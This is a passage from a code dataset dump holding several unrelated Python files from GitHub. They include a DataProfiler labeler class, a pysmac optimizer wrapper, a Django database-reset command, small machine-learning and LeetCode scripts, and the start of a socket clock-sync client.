= None) -> None:\n \"\"\"\n Load and initializes the data data labeler in the given path.\n\n :param dirpath: location of data labeler info files.\n :type dirpath: str\n :param load_options: optional arguments to include for load i.e. class\n for model or processors\n :type load_options: dict\n :return: None\n \"\"\"\n # get loaded parameters\n params = self._load_parameters(dirpath, load_options)\n model_params = params.get(\"model\")\n preprocessor_params = params.get(\"preprocessor\")\n postprocessor_params = params.get(\"postprocessor\")\n\n # setup data labeler based on parameters\n self._load_model(model_params.get(\"class\"), dirpath) # type: ignore\n self._load_preprocessor(\n preprocessor_params.get(\"class\"), dirpath # type: ignore\n )\n self._load_postprocessor(\n postprocessor_params.get(\"class\"), dirpath # type: ignore\n )\n\n @classmethod\n def load_from_library(cls, name: str) -> BaseDataLabeler:\n \"\"\"\n Load the data labeler from the data labeler zoo in the library.\n\n :param name: name of the data labeler.\n :type name: str\n :return: DataLabeler class\n :rtype: BaseDataLabeler\n \"\"\"\n labeler = cls(os.path.join(default_labeler_dir, name))\n labeler._default_model_loc = name\n return labeler\n\n @classmethod\n def load_from_disk(cls, dirpath: str, load_options: dict = None) -> BaseDataLabeler:\n \"\"\"\n Load the data labeler from a saved location on disk.\n\n :param dirpath: path to data labeler files.\n :type dirpath: str\n :param load_options: optional arguments to include for load i.e. class\n for model or processors\n :type load_options: dict\n :return: DataLabeler class\n :rtype: BaseDataLabeler\n \"\"\"\n return cls(dirpath, load_options)\n\n @classmethod\n def load_with_components(\n cls,\n preprocessor: data_processing.BaseDataPreprocessor,\n model: BaseModel,\n postprocessor: data_processing.BaseDataPostprocessor,\n ) -> BaseDataLabeler:\n \"\"\"\n Load the data labeler from a its set of components.\n\n :param preprocessor: processor to set as the preprocessor\n :type preprocessor: data_processing.BaseDataPreprocessor\n :param model: model to use within the data labeler\n :type model: base_model.BaseModel\n :param postprocessor: processor to set as the postprocessor\n :type postprocessor: data_processing.BaseDataPostprocessor\n :return: loaded BaseDataLabeler\n :rtype: BaseDataLabeler\n \"\"\"\n data_labeler = type(\"CustomDataLabeler\", (BaseDataLabeler,), {})()\n data_labeler.set_preprocessor(preprocessor)\n data_labeler.set_model(model)\n data_labeler.set_postprocessor(postprocessor)\n return cast(BaseDataLabeler, data_labeler)\n\n def _save_model(self, dirpath: str) -> None:\n \"\"\"\n Save the data labeler model.\n\n :param dirpath: path to save the data labeler\n :type dirpath: str\n :return: None\n \"\"\"\n self._model.save_to_disk(dirpath)\n\n def _save_preprocessor(self, dirpath: str) -> None:\n \"\"\"\n Save the preprocessor for the data labeler.\n\n :param dirpath: path to save the data processor\n :type dirpath: str\n :return: None\n \"\"\"\n self._preprocessor.save_to_disk(dirpath)\n\n def _save_postprocessor(self, dirpath: str) -> None:\n \"\"\"\n Save the postprocessor for the data labeler.\n\n :param dirpath: path to save the data processor\n :type dirpath: str\n :return: None\n \"\"\"\n self._postprocessor.save_to_disk(dirpath)\n\n def _save_parameters(self, dirpath: str) -> None:\n \"\"\"\n Save data labeler-specific parameters.\n\n :param dirpath: location to save the parameters\n :type dirpath: str\n :return: None\n \"\"\"\n parameters = {\n \"model\": {\"class\": self._model.__class__.__name__},\n \"preprocessor\": {\n \"class\": self._preprocessor.__class__.__name__,\n },\n \"postprocessor\": {\n \"class\": self._postprocessor.__class__.__name__,\n },\n }\n with open(os.path.join(dirpath, \"data_labeler_parameters.json\"), \"w\") as fp:\n json.dump(parameters, fp)\n\n def _save_data_labeler(self, dirpath: str) -> None:\n \"\"\"\n Save each component of the data labeler to the specified location.\n\n :param dirpath: path to where to save the data labeler.\n :type dirpath: str\n :return: None\n \"\"\"\n self._save_parameters(dirpath)\n self._save_model(dirpath)\n self._save_preprocessor(dirpath)\n self._save_postprocessor(dirpath)\n\n def save_to_disk(self, dirpath: str) -> None:\n \"\"\"\n Save the data labeler to the specified location.\n\n :param dirpath: location to save the data labeler.\n :type dirpath: str\n :return: None\n \"\"\"\n # note diff from saving to cloud which would create a temp path then\n # delete\n self._save_data_labeler(dirpath)\n\n\nclass TrainableDataLabeler(BaseDataLabeler):\n \"\"\"Subclass of BaseDataLabeler that can be trained.\"\"\"\n\n def fit(\n self,\n x: DataArray,\n y: DataArray,\n validation_split: float = 0.2,\n labels: list | dict | None = None,\n reset_weights: bool = False,\n batch_size: int = 32,\n epochs: int = 1,\n error_on_mismatch: bool = False,\n ) -> list:\n \"\"\"\n Fit the data labeler model for the dataset.\n\n :param x: samples to fit model\n :type x: Union[pd.DataFrame, pd.Series, np.ndarray]\n :param y: labels associated with the samples to fit model\n :type y: Union[pd.DataFrame, pd.Series, np.ndarray]\n :param validation_split: split of the data to have as cross-validation\n data\n :type validation_split: float\n :param labels: Encoding or number of labels if refit is needed to new\n labels\n :type labels: Union[list, dict]\n :param reset_weights: Flag to determine whether or not to reset the\n weights\n :type reset_weights: bool\n :param batch_size: Size of each batch sent to data labeler model\n :type batch_size: int\n :param epochs: number of epochs to iterate over the dataset and send to\n the model\n :type epochs: int\n :param error_on_mismatch: if true, errors instead of warns on parameter\n mismatches in pipeline\n :type error_on_mismatch: bool\n :return: model output\n \"\"\"\n # input validation checks\n x = self._check_and_return_valid_data_format(x, fit_or_predict=\"fit\")\n y = self._check_and_return_valid_data_format(y, fit_or_predict=\"fit\")\n\n num_samples = len(x)\n if num_samples == 0 or len(y) == 0:\n raise ValueError(\"No data or labels to fit.\")\n elif num_samples != len(y):\n raise ValueError(\"Data and labels must be the same length.\")\n elif validation_split < 0.0 or validation_split >= 1.0:\n raise ValueError(\"`validation_split` must be >= 0 and less than 1.0\")\n\n # check pipeline\n self.check_pipeline(\n skip_postprocessor=False, error_on_mismatch=error_on_mismatch\n )\n\n # fit to model\n if labels is not None:\n self.set_labels(labels)\n if reset_weights:\n self._model.reset_weights()\n\n # shuffle input data\n shuffle_inds = np.random.permutation(num_samples)\n x = x[shuffle_inds]\n y = y[shuffle_inds]\n\n # free memory\n del shuffle_inds\n\n # preprocess data\n cv_split_index = max(1, int(num_samples * (1 - validation_split)))\n train_data = self._preprocessor.process(\n x[:cv_split_index],\n labels=y[:cv_split_index],\n label_mapping=self.label_mapping,\n batch_size=batch_size,\n )\n cv_data = (\n None\n if not validation_split or cv_split_index < 2\n else self._preprocessor.process(\n x[cv_split_index:],\n labels=y[cv_split_index:],\n label_mapping=self.label_mapping,\n batch_size=batch_size,\n )\n )\n\n results = []\n for i in range(epochs):\n results.append(\n cast(TrainableDataLabeler, self._model).fit(train_data, cv_data)\n )\n if i < epochs - 1:\n # shuffle input data\n shuffle_inds = np.random.permutation(cv_split_index)\n train_data_x = x[shuffle_inds]\n train_data_y = y[shuffle_inds]\n\n # free memory\n del shuffle_inds\n\n train_data = self._preprocessor.process(\n train_data_x,\n labels=train_data_y,\n label_mapping=self.label_mapping,\n batch_size=batch_size,\n )\n cv_data = (\n None\n if not validation_split or cv_split_index < 2\n else self._preprocessor.process(\n x[cv_split_index:],\n labels=y[cv_split_index:],\n label_mapping=self.label_mapping,\n batch_size=batch_size,\n )\n )\n return results\n\n def set_model(self, model: BaseModel) -> None:\n \"\"\"\n Set the model for a trainable data labeler.\n\n Model must have a train function to be able to be set.\n\n :param model: model to use within the data labeler\n :type model: base_model.BaseModel\n :return: None\n \"\"\"\n if not hasattr(model, \"fit\"):\n raise ValueError(\"`model` must have a fit function to be \" \"trainable.\")\n BaseDataLabeler.set_model(self, model)\n\n @classmethod\n def load_with_components(\n cls,\n preprocessor: data_processing.BaseDataPreprocessor,\n model: BaseModel,\n postprocessor: data_processing.BaseDataPostprocessor,\n ) -> TrainableDataLabeler:\n \"\"\"\n Load the data labeler from a its set of components.\n\n :param preprocessor: processor to set as the preprocessor\n :type preprocessor: data_processing.BaseDataPreprocessor\n :param model: model to use within the data labeler\n :type model: base_model.BaseModel\n :param postprocessor: processor to set as the postprocessor\n :type postprocessor: data_processing.BaseDataPostprocessor\n :return: loaded TrainableDataLabeler\n :rtype: TrainableDataLabeler\n \"\"\"\n data_labeler = type(\"CustomTrainableDataLabeler\", (TrainableDataLabeler,), {})()\n data_labeler.set_preprocessor(preprocessor)\n data_labeler.set_model(model)\n data_labeler.set_postprocessor(postprocessor)\n return cast(TrainableDataLabeler, data_labeler)\n","repo_name":"capitalone/DataProfiler","sub_path":"dataprofiler/labelers/base_data_labeler.py","file_name":"base_data_labeler.py","file_ext":"py","file_size_in_byte":33092,"program_lang":"python","lang":"en","doc_type":"code","stars":1277,"dataset":"github-code","pt":"21"} +{"seq_id":"70594372852","text":"from sklearn.model_selection import train_test_split\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom LinearRegressin import LinearRegression\nfrom LinearRegressin import LinearRegression_GD\n\nX, y = datasets.make_regression(n_samples=5000, n_features=1, noise=20, random_state=4)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=1234)\n\nLR = LinearRegression()\nLR.fit(X_train, y_train)\ny1_test_predict = LR.predict(X_test)\nEout = np.mean( (y1_test_predict - y_test)**2 )\ny_line = LR.predict(X)\n\nLR2 = LinearRegression_GD(lr = 0.0001, n_itr=50000)\nLR2.fit(X_train, y_train)\ny2_test_predict = LR2.predict(X_test)\nEout2 = np.mean( (y2_test_predict - y_test)**2 )\n\nfig = plt.figure(figsize=(8,6))\nplt.plot(X, y_line, color='r')\nplt.scatter(X_train[:,0], y_train, color='b' , marker='o', s=10)\nplt.scatter(X_test[:,0], y_test, color='y', marker='o', s=20 )","repo_name":"maArami/Ml","sub_path":"LinearRegression/LR_test.py","file_name":"LR_test.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12256713791","text":"import bisect\nclass Solution:\n def countSmaller(self, nums: List[int]) -> List[int]:\n sort_nums = []\n ans = []\n for i in nums[::-1]:\n index = bisect.bisect_left(sort_nums, i)\n bisect.insort(sort_nums, i)\n ans.append(index)\n return ans[::-1]","repo_name":"PlutoaCharon/CodeExercise_Python","sub_path":"LeetCode/每日一题/0711-315. 计算右侧小于当前元素的个数.py","file_name":"0711-315. 计算右侧小于当前元素的个数.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"72907326774","text":"# -*-coding:utf8-*-\n# @auth 小哥哥\n# @time 2020/8/22 10:01\n\n\nfrom datetime import datetime\nimport openpyxl, xlrd\nfrom sktest.common.config import header, keywords, result_col\nfrom sktest.common.globals import g\nfrom pathlib import Path\n\n\nclass Excel:\n\n def __init__(self, file_path, mode='r'):\n self.file_path = file_path\n if mode == 'r':\n self.workbook = xlrd.open_workbook(file_path)\n\n elif mode == 'w':\n self.workbook = openpyxl.load_workbook(file_path)\n\n def read(self, sheet_name):\n \"\"\"\n 读取excel数据\n :param sheet_name: 表格标签名\n :return:[[],……]\n \"\"\"\n sheet = self.workbook.sheet_by_name(sheet_name)\n rows = sheet.nrows\n data = []\n for i in range(rows):\n data.append(sheet.row_values(i))\n return data\n\n def write(self, sheet_name, data):\n sheet = self.workbook[sheet_name]\n for i, v in enumerate(data):\n sheet.cell(i + 2, result_col, v)\n self.workbook.save(self.file_path)\n\n def close(self):\n self.workbook.close()\n\n\ndef data_to_dict(data):\n \"\"\"\n 格式化excel表头为键数据为值的字典\n :param data:[[],……]\n :return:[{},……{}]\n \"\"\"\n header_dict = {}\n dict_data_list = []\n key = []\n for i in data[0]:\n k = i.strip()\n h = header.get(k, k).lower()\n key.append(h)\n header_dict[h] = k\n for i in data[1:]:\n data_dict = {}\n for j in range(len(key)):\n data_dict[key[j]] = i[j]\n dict_data_list.append(data_dict)\n return dict_data_list\n\n\ndef test_suit_format(data):\n \"\"\"\n 格式化测试套件 将用例组成一个套件\n [\n {'id': 'sktest-1', 'title': '百度搜索', 'condition': '', 'flag': '', 'result': '',\n 'steps': [{'step': '1.0', 'operation': '打开', 'page': '百度', 'element': '百度搜索链接', 'testdata': ''},\n {'step': '2.0', 'operation': '检查', 'page': '百度', 'element': '页面标题', 'testdata': ''}]},\n {'id': 'sktest-2', 'title': '打开搜狗', 'condition': '', 'flag': '', 'result': '',\n 'steps': [{'step': '1.0', 'operation': '查看', 'page': '搜狗', 'element': '搜狗页面', 'testdata': ''}]}\n ]\n :param data:\n :return: iter@迭代器\n \"\"\"\n test_suite = []\n test_case = {}\n data = data_to_dict(data)\n for i in data:\n if i['id'].strip():\n if test_case.get('id'):\n test_suite.append(test_case)\n test_case = {}\n for key in ('id', 'title', 'condition', 'flag', 'expected'):\n test_case[key] = i[key]\n\n test_case['steps'] = []\n stp = i['step']\n if stp:\n step = {'step': str(stp)}\n for key in ('operation', 'page', 'element', 'data'):\n if i[key]:\n if i['page']:\n g.page = i['page']\n else:\n i['page'] = g.page\n step[key] = i[key]\n test_case['steps'].append(step)\n if test_case:\n test_suite.append(test_case)\n return test_suite\n # return iter(test_suite)\n\n\ndef element_format(data):\n \"\"\"\n 格式化元素,返回一个以页面+元素为key的字典\n :param data:\n :return:{{},……}\n \"\"\"\n elements = {}\n data = data_to_dict(data)\n for d in data:\n if d['page']:\n g.page = d['page']\n else:\n d['page'] = g.page\n elements[d['page'] + '-' + d['element']] = d\n return elements\n\n\ndef check_keyword(k):\n k_ = keywords.get(k)\n return k_\n\n\ndef format_step_data(step_data):\n data_dict = {}\n if step_data:\n data_list = step_data.split(',')\n for data in data_list:\n d_ = data.split('=', 1)\n if len(d_) == 1:\n data_dict['text'] = d_[0]\n elif len(d_) == 2:\n data_dict[d_[0]] = d_[1]\n else:\n raise Exception(\"Error: TestData is error !!!\")\n\n return data_dict\n\n\ndef parse(test_case):\n \"\"\"\n 解析测用例\n 将 打开 百度搜索链接 转换成 open https://www.baidu.com\n \"\"\"\n for step in test_case['steps']:\n step['operation'] = check_keyword(step['operation'])\n step['data'] = format_step_data(step.get('data'))\n\n\ndef get_today():\n now = datetime.now()\n return now.strftime('%Y%m%d')\n\n\ndef mkdir_(directory):\n path_ = Path(directory)\n if not path_.is_dir():\n path_.mkdir(parents=True)\n return str(path_)\n\n\nif __name__ == '__main__':\n # e = Excel(r'D:\\Desktop\\Excel File\\sktest.xlsx', mode='r')\n # print('==' * 20)\n # print(testsuit_format(e.read('case')))\n # print(element_format(e.read('elements')))\n\n pass\n","repo_name":"cxyboy/sktest","sub_path":"common/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73028139253","text":"from __future__ import print_function, division, absolute_import\n\nimport sys\nimport tempfile\nimport os\nimport shutil\nimport errno\nimport operator\nimport multiprocessing\nimport logging\nimport csv\n\nfrom .utils.smac_output_readers import read_trajectory_file\nimport pysmac.remote_smac\nfrom .utils.multiprocessing_wrapper import MyPool\nfrom pysmac.utils.java_helper import check_java_version, smac_classpath\n\n\nclass SMAC_optimizer(object):\n \"\"\"\n The main class of pysmac instanciated by the user.\n \n This is the class a user instanciates to use SMAC. Constructing the\n object does not start the minimization immediately. The user has to\n call the method minimize for the actual optimization. This design\n choice enables easy enough usage for novice users, but allows experts\n to change many of SMAC's parameters by editing the 'smac_options' dict\n \"\"\"\n\n\n smac_options = {}\n \"\"\" A dict associated with the optimizer object that controlls options\n mainly for SMAC\n \"\"\"\n\n\n\n # collects smac specific data that go into the scenario file\n def __init__(self, t_limit_total_s=None, mem_limit_smac_mb=None, working_directory = None, persistent_files=False, debug = False):\n \"\"\"\n \n :param t_limit_total_s: the total time budget (in seconds) for the optimization. None means that no wall clock time constraint is enforced.\n :type t_limit_total_s: float\n :param mem_limit_smac_mb: memory limit for the Java Runtime Environment in which SMAC will be executed. None means system default.\n :type mem_limit_smac_mb: int\n :param working_directory: directory where SMACs output files are stored. None means a temporary directory will be created via the tempfile module.\n :type working_directory: str\n :param persistent_files: whether or note these files persist beyond the runtime of the optimization.\n :type persistent_files: bool\n :param debug: set this to true for debug information (pysmac and SMAC itself) logged to standard-out. \n :type debug: bool\n \"\"\"\n \n self.__logger = multiprocessing.log_to_stderr()\n if debug:\n self.__logger.setLevel(debug)\n else:\n self.__logger.setLevel(logging.WARNING)\n \n self.__t_limit_total_s = 0 if t_limit_total_s is None else int(t_limit_total_s)\n self.__mem_limit_smac_mb = None if (mem_limit_smac_mb is None) else int(mem_limit_smac_mb)\n \n self.__persistent_files = persistent_files\n \n # some basic consistency checks\n\n if (self.__t_limit_total_s < 0):\n raise ValueError('The total time limit cannot be nagative!')\n if (( self.__mem_limit_smac_mb is not None) and (self.__mem_limit_smac_mb <= 0)):\n raise ValueError('SMAC\\'s memory limit has to be either None (no limit) or positive!')\n\n \n # create a temporary directory if none is specified\n if working_directory is None:\n self.working_directory = tempfile.mkdtemp()\n else:\n self.working_directory = working_directory\n \n self.__logger.debug('Writing output into: %s'%self.working_directory)\n \n # make some subdirs for output and smac internals\n self.__exec_dir = os.path.join(self.working_directory, 'exec')\n self.__out_dir = os.path.join(self.working_directory, 'out' )\n\n for directory in [self.working_directory, self.__exec_dir, self.__out_dir]:\n try:\n os.makedirs(directory)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n \n \n # Set some of smac options\n # Most fields contain the standard values (as of SMAC 2.08.00).\n # All options from the smac manual can be accessed by\n # adding an entry to the dictionary with the appropriate name.\n # Some options will however have, at best, no effect, setting\n # others may even brake the communication.\n self.smac_options = {\n 'algo-exec': 'echo 0',\n 'run-obj': 'QUALITY',\n 'validation': False,\n 'cutoff_time': 3600,\n 'intensification-percentage': 0.5,\n 'numPCA': 7,\n 'rf-full-tree-bootstrap': False,\n 'rf-ignore-conditionality':False,\n 'rf-num-trees': 10,\n 'skip-features': True,\n 'pcs-file': os.path.join(self.working_directory,'parameters.pcs'),\n 'instances': os.path.join(self.working_directory ,'instances.dat'),\n 'algo-exec-dir': self.working_directory,\n 'output-dir': self.__out_dir,\n 'console-log-level': 'OFF',\n 'abort-on-first-run-crash': False,\n 'overall_obj': 'MEAN',\n 'scenario_fn': 'scenario.dat', # NOT a SMAC OPTION, but allows to\n # change the standard name (used\n # in Spysmac)\n 'java_executable': 'java', # NOT a SMAC OPTION; allows to \n # specify a different java\n # binary and can be abused to \n # pass additional arguments to it\n 'timeout_quality':2.**127, # not a SMAC option either\n # custamize the quality reported\n # to SMAC in case of a timeout\n }\n if debug:\n self.smac_options['console-log-level']='INFO'\n\n def __del__(self):\n \"\"\"\n Destructor cleaning up after SMAC finishes depending on the persistent_files flag.\n \"\"\"\n if not self.__persistent_files:\n shutil.rmtree(self.working_directory)\n\n def minimize(self, func, max_evaluations, parameter_dict, \n conditional_clauses = [], forbidden_clauses=[],\n deterministic = True,\n num_train_instances = None, num_test_instances = None,\n train_instance_features = None,\n num_runs = 1, num_procs = 1, seed = 0,\n mem_limit_function_mb=None, t_limit_function_s= None):\n \"\"\"\n Function invoked to perform the actual minimization given all necessary information.\n \n :param func: the function to be called\n :type func: callable\n :param max_evaluations: number of function calls allowed during the optimization (does not include optional validation).\n :type max_evaluations: int\n :param parameter_dict: parameter configuration space definition, see :doc:`pcs`.\n :type parameter_dict: dict\n :param conditional_clauses: list of conditional dependencies between parameters, see :doc:`pcs`.\n :type parameter_dict: list\n :param forbidden_clauses: list of forbidden parameter configurations, see :doc:`pcs`.\n :type parameter_dict: list\n :param deterministic: whether the function to be minimized contains random components, see :ref:`non-deterministic`.\n :type deterministic: bool\n :param num_train_instances: number of instances used during the configuration/optimization, see :ref:`training_instances`.\n :type num_train_instances: int\n :param num_test_instances: number of instances used for testing/validation, see :ref:`validation`.\n :type num_test_instances: int\n :param num_runs: number of independent SMAC runs.\n :type num_runs: int\n :param num_procs: number SMAC runs that can be executed in paralell\n :type num_procs: int\n :param seed: seed for SMAC's Random Number generator. If int, it is used for the first run, additional runs use consecutive numbers. If list, it specifies a seed for every run.\n :type seed: int/list of ints\n :param mem_limit_function_mb: sets the memory limit for your function (value in MB). ``None`` means no restriction. Be aware that this limit is enforced for each SMAC run separately. So if you have 2 parallel runs, pysmac could use twice that value (and twice the value of mem_limit_smac_mb) in total. Note that due to the creation of the subprocess, the amount of memory available to your function is less than the value specified here. This option exists mainly to prevent a memory usage of 100% which will at least slow the system down.\n :type mem_limit_function_mb: int\n :param t_limit_function_s: cutoff time for a single function call. ``None`` means no restriction. If optimizing run time, SMAC can choose a shorter cutoff than the provided one for individual runs. If `None` was provided, then there is no cutoff ever!\n \"\"\"\n\n self.smac_options['algo-deterministic'] = deterministic\n \n # adjust the number of training instances\n num_train_instances = None if (num_train_instances is None) else int(num_train_instances)\n \n if (num_train_instances is not None):\n if (num_train_instances < 1):\n raise ValueError('The number of training instances must be positive!')\n # check if instance features are provided\n if (train_instance_features is not None):\n # make sure it's the right number of instances\n if (len(train_instance_features) != num_train_instances):\n raise ValueError(\"You have to provide features for every training instance!\")\n # and the same number of features\n nf = len(train_instance_features[0])\n for feature_vector in train_instance_features:\n if (len(feature_vector) != nf):\n raise ValueError(\"You have to specify the same number of features for every instance!\")\n self.smac_options['feature_file'] = os.path.join(self.working_directory ,'features.dat')\n \n\n\n num_procs = int(num_procs)\n pcs_string, parser_dict = pysmac.remote_smac.process_parameter_definitions(parameter_dict)\n\n # adjust the seed variable\n if isinstance(seed, int):\n seed = list(range(seed, seed+num_runs))\n elif isinstance(seed, list) or isinstance(seed, tuple):\n if len(seed) != num_runs:\n raise ValueError(\"You have to specify a seed for every run!\")\n else:\n raise ValueError(\"The seed variable could not be properly processed!\")\n \n \n self.smac_options['runcount-limit'] = max_evaluations\n if t_limit_function_s is not None:\n self.smac_options['cutoff_time'] = t_limit_function_s\n \n \n # create and fill the pcs file\n with open(self.smac_options['pcs-file'], 'w') as fh:\n fh.write(\"\\n\".join(pcs_string + conditional_clauses + forbidden_clauses))\n \n #create and fill the instance files\n tmp_num_instances = 1 if num_train_instances is None else num_train_instances\n with open(self.smac_options['instances'], 'w') as fh:\n for i in range(tmp_num_instances):\n fh.write(\"id_%i\\n\"%i)\n \n # create and fill the feature file\n if (train_instance_features is not None):\n with open(self.smac_options['feature_file'], 'w') as fh:\n #write a header\n tmp = ['instance_name'] + list(map(lambda i: 'feature{}'.format(i), range(len(train_instance_features[0]))))\n fh.write(\",\".join(tmp));\n fh.write(\"\\n\");\n\n # and then the actual features\n for i in range(len(train_instance_features)):\n tmp = ['id_{}'.format(i)] + [\"{}\".format(f) for f in train_instance_features[i]]\n fh.write(\",\".join(tmp))\n fh.write(\"\\n\");\n \n\n if num_test_instances is not None:\n # TODO: honor the users values for validation if set, and maybe show a warning on stdout\n self.smac_options['validate-only-last-incumbent'] = True\n self.smac_options['validation'] = True\n self.smac_options['test-instances'] = os.path.join(self.working_directory, 'test_instances.dat')\n with open(self.smac_options['test-instances'],'w') as fh:\n for i in range(tmp_num_instances, tmp_num_instances + num_test_instances):\n fh.write(\"id_%i\\n\"%i)\n\n # make sure the java executable is callable and up-to-date\n java_executable = self.smac_options.pop('java_executable')\n check_java_version(java_executable)\n\n timeout_quality = self.smac_options.pop('timeout_quality')\n\n\n # create and fill the scenario file\n scenario_fn = os.path.join(self.working_directory,self.smac_options.pop('scenario_fn'))\n\n \n scenario_options = {'algo', 'algo-exec', 'algoExec',\n 'algo-exec-dir', 'exec-dir', 'execDir','execdir',\n 'deterministic', 'algo-deterministic',\n 'paramfile', 'paramFile', 'pcs-file', 'param-file',\n 'run-obj', 'run-objective', 'runObj', 'run_obj',\n 'intra-obj', 'intra-instance-obj', 'overall-obj', 'intraInstanceObj', 'overallObj', 'overall_obj', 'intra_instance_obj',\n 'algo-cutoff-time', 'target-run-cputime-limit', 'target_run_cputime_limit', 'cutoff-time', 'cutoffTime', 'cutoff_time', \n 'cputime-limit', 'cputime_limit', 'tunertime-limit', 'tuner-timeout', 'tunerTimeout',\n 'wallclock-limit', 'wallclock_limit', 'runtime-limit', 'runtimeLimit', 'wallClockLimit',\n 'output-dir', 'outputDirectory', 'outdir',\n 'instances', 'instance-file', 'instance-dir', 'instanceFile', 'i', 'instance_file', 'instance_seed_file',\n 'test-instances', 'test-instance-file', 'test-instance-dir', 'testInstanceFile', 'test_instance_file', 'test_instance_seed_file', \n 'feature-file', 'instanceFeatureFile', 'feature_file'\n }\n \n additional_options_fn =scenario_fn[:-4]+'.advanced' \n with open(scenario_fn,'w') as fh, open(additional_options_fn, 'w') as fg:\n for name, value in list(self.smac_options.items()):\n if name in scenario_options:\n fh.write('%s %s\\n'%(name, value))\n else:\n fg.write('%s %s\\n'%(name,value))\n \n # check that all files are actually present, so SMAC has everything to start\n assert all(map(os.path.exists, [additional_options_fn, scenario_fn, self.smac_options['pcs-file'], self.smac_options['instances']])), \"Something went wrong creating files for SMAC! Try to specify a \\'working_directory\\' and set \\'persistent_files=True\\'.\"\n\n # create a pool of workers and make'em work\n pool = MyPool(num_procs)\n argument_lists = [[scenario_fn, additional_options_fn, s, func, parser_dict, self.__mem_limit_smac_mb, smac_classpath(), num_train_instances, mem_limit_function_mb, t_limit_function_s, self.smac_options['algo-deterministic'], java_executable, timeout_quality] for s in seed]\n \n pool.map(pysmac.remote_smac.remote_smac_function, argument_lists)\n \n pool.close()\n pool.join()\n \n # find overall incumbent and return it\n \n scenario_dir = os.path.join(self.__out_dir,'.'.join(scenario_fn.split('/')[-1].split('.')[:-1]))\n \n run_incumbents = []\n \n for s in seed:\n fn = os.path.join(scenario_dir, 'traj-run-%i.txt'%s)\n run_incumbents.append(read_trajectory_file(fn)[-1])\n\n run_incumbents.sort(key = operator.itemgetter(\"Estimated Training Performance\"))\n\n param_dict = run_incumbents[0]['Configuration']\n\n for k in param_dict:\n param_dict[k] = parser_dict[k](param_dict[k])\n\n return( run_incumbents[0][\"Estimated Training Performance\"], param_dict)\n","repo_name":"LiuFang816/SALSTM_py_data","sub_path":"python/automl_pysmac/pysmac-master/pysmac/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":16173,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"21"} +{"seq_id":"285864006","text":"import os\nimport shutil\nfrom pathlib import Path\n\nfrom django.core import management\nfrom django.core.management import BaseCommand\n\n\nclass Command(BaseCommand):\n help = \"Resets the database (delete db -> delete migrations -> makemigrations --> default migration -> migrate)\"\n\n def handle(self, *args, **options):\n self.stdout.write('Running reset database management command')\n\n # 'core' app directory\n core_app_path = Path(__file__).parents[2]\n\n # 'core/db.sqlite3'\n db_path = os.path.join(Path(__file__).parents[3], \"db.sqlite3\")\n\n # 'core/migrations' folder\n migrations_path = os.path.join(core_app_path, \"migrations\")\n\n # stage 1: delete database\n self.stdout.write('[1] Database:')\n\n # try to remove db\n try:\n os.remove(db_path)\n self.stdout.write(' - Deleted db.sqlite3!')\n except FileNotFoundError:\n self.stdout.write(' - Database not found, nothing to do here...')\n\n # stage 2: delete migrations\n self.stdout.write('[2] Delete migrations:')\n\n # find files in the migration folder\n migration_files = os.listdir(migrations_path)\n self.stdout.write(self.style.SUCCESS(' - Found these files: %s' % str(migration_files)))\n\n # remove migration files, except ignored files/directories\n ignored = [\"__init__.py\", \"__pycache__\", \"default\"]\n for file in migration_files:\n if file not in ignored:\n os.remove(os.path.join(migrations_path, file))\n self.stdout.write(' - Removed \"%s\"' % file)\n\n # stage 3: makemigrations\n self.stdout.write('[3] Calling makemigrations:')\n management.call_command('makemigrations')\n\n # stage 4: copy `default/default_migration.py` to `0002_initial.py`\n self.stdout.write('[4] Copying default migration file:')\n src = os.path.join(migrations_path, \"default\", \"default_migration.py\")\n dst = os.path.join(migrations_path, \"0002_initial.py\")\n try:\n shutil.copyfile(src, dst)\n self.stdout.write(' - Migration file \\'0002_initial.py\\' created!')\n except FileNotFoundError:\n self.stdout.write(' - \\'_default_migration.py\\' not found, nothing copied!')\n\n # stage 5: migrate\n self.stdout.write('[5] Calling migrate:')\n management.call_command('migrate')\n\n self.stdout.write(self.style.SUCCESS('\\nSuccessfully completed resetdb!'))\n","repo_name":"chongyih/aasp-core","sub_path":"core/management/commands/resetdb.py","file_name":"resetdb.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28481948963","text":"terms = ['approach', 'breakthrough', 'drug', 'hope',\n 'new', 'patient', 'schizophrenia', 'treatment']\n\nhashed = []\nfor term in terms:\n hashval = 0\n for idx, i in enumerate(term):\n hashval = hashval + (ord(i) * idx+1)\n hashed.append(hashval)\n\nfor idx, term in enumerate(terms):\n print(term, ': ', hashed[idx])\n","repo_name":"ghazimuharam/cosine-measure","sub_path":"src/inverted_index/Hash_inverted_index/hash_fun.py","file_name":"hash_fun.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2970779902","text":"#Eda ARSLAN 170401024\r\n\r\nimport socket\r\nimport os\r\nfrom time import gmtime,strftime\r\nfrom datetime import datetime\r\nimport time\r\nimport datetime\r\n\r\nhost = input(\"Sunucu ip adresini girin: \")\r\n\r\n#host = '192.168.1.36'\r\nport = 142\r\nmsg = \"gecikme hesabi\"\r\n\r\nkmt = 'sudo date --set='\r\n\r\nfrmt = '%m/%d/%Y %H:%M:%S.%f'\r\n\r\ntry:\r\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n s.connect((host,port))\r\n print(\"Sunucu ile bağlanılıyor.\")\r\n \r\nexcept s.error:\r\n print(\"Hata!\",s.error)\r\n sock.close()\r\n\r\nmsj=s.recv(1024)\r\n\r\n\r\noffset=s.recv(1024)\r\noffset=offset.decode()\r\n\r\ndata=s.recv(1024)\r\ndata=data.decode()\r\nprint(\"data: 